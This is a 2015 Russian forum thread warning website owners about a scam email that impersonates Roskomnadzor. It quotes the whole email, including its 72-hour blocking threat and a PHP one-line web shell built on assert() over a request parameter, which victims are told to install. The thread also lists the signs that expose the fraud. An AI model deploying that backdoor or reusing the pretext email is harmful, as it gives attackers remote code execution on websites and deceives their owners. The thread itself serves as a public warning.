Форум для тех, кто хочет выиграть в Гослото
https://lotoforum.ru/

Необычный развод под видом Роскомнадзора
https://lotoforum.ru/viewtopic.php?f=6&t=10501
Страница 1 из 1

Автор:  gosloto6x45 [ 27 авг 2015 12:03 ]
Заголовок сообщения:  Необычный развод под видом Роскомнадзора

Если вы получили письмо от Роскомнадзора с требованием поставить некий код на сайт для идентификации, не спешите этого делать. На этот раз мошенники удачно "прикинулись" официальной организацией, скопировав часть официального уведомления, а дальше придумали свои требования и для блокировки "мозговой деятельности" получателя добавили еще:

==
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете
себя, как администратор доменного имени www.ваш_сайт.ru, следую инструкции указанной
выше, то Ваш сайт www.ваш_сайт.ru будет внесен в чёрные списки интернет-провайдеров и
заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ
КОММУНИКАЦИЙ.

==

Кто-то бросился читать упомянутый закон в тексте письма, а когда обнаружил, что подобный закон есть, не стал вникать ни в закон, ни в адресата, ни в суть требования... Хорошо, если сайт реально не набрал еще 3000 посетителей в сутки, о чем говорится в законе, тогда с ходу появляются сомнения. Владельцы же посещаемых ресурсов, особенно если они не являются техническими администраторами своих сайтов, оказались в ступоре.

Забегая вперед, конечно же, это обман и указанный код нельзя ставить на сайт ни в коем случае. Он позволяет сделать что угодно с вашим сайтом и прежде всего "закачать" на сайт какой-нибудь вирус или троян. Почитайте просто про указанную в коде php-функцию assert(), чтобы стало понятно, о чем идет речь.

Догадаться о том, что это мошенничество, можно было прежде всего по обратному адресу, который располагается в зарубежной доменной зоне org, чего официальная организация из России не сделала бы никогда. А если вы умеете смотреть заголовки письма, то увидели бы и тот факт, что отправлено оно с доменного имени sendgrid.net (возможно, есть разные вариации, откуда оправляли мошенники, с такого домена пришло нам).

Резюмируя, хочется сказать про оригинальность данного развода, так как удачно сослались на существующий закон, скопировали часть официального текста и, самое главное, ограничили по времени, пугая добавлением в черные списки. Единственный плюс - скорость реакции сайтов, которые поняли, что это неправда, выложив информацию в интернет.

Если вы читаете этот текст, также скопируйте его и выложите на своем сайте, чтобы другие могли найти информацию по этому способу мошенничества...

Автор:  gosloto6x45 [ 27 авг 2015 12:04 ]
Заголовок сообщения:  Re: Необычный развод под видом Роскомнадзора

Прилагаю также полный текст подобного "письма счастья":

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи,
информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь
администратором доменного имени www.ваш_сайт.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении
изменений в Федеральный закон "Об информации, информационных технологиях и о защите
информации" и на основании решения суда (Новокуйбышевский городской суд Самарской
области) от 11.08.2015 No 2­1618/2015, Ваш сайт www.ваш_сайт.ru был внесен в реестр
организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц
сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к
которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени www.ваш_сайт.ru, Вам
необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128041.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени www.ваш_сайт.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел перед ?php
Путь до файла на Вашем сайте должен получиться следующий:
www.ваш_сайт.ru/reestr/reestr-id128041.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете
себя, как администратор доменного имени www.ваш_сайт.ru, следую инструкции указанной
выше, то Ваш сайт www.ваш_сайт.ru будет внесен в чёрные списки интернет-провайдеров и
заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ
КОММУНИКАЦИЙ.

Автор:  Doktor [ 28 авг 2015 17:46 ]
Заголовок сообщения:  Re: Необычный развод под видом Роскомнадзора

Спасибо, теперь вооружен :neo:

Автор:  gosloto6x45 [ 18 сен 2015 20:38 ]
Заголовок сообщения:  Re: Необычный развод под видом Роскомнадзора

Я, можно сказать, сам сперва попался... уже собрался код ставить на сайт, но пыл охладили коллеги, которые указали, куда надо посмотреть, чтобы понять, что это чистой воды развод...

Страница 1 из 1 Часовой пояс: UTC + 3 часа [ Летнее время ]
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
http://www.phpbb.com/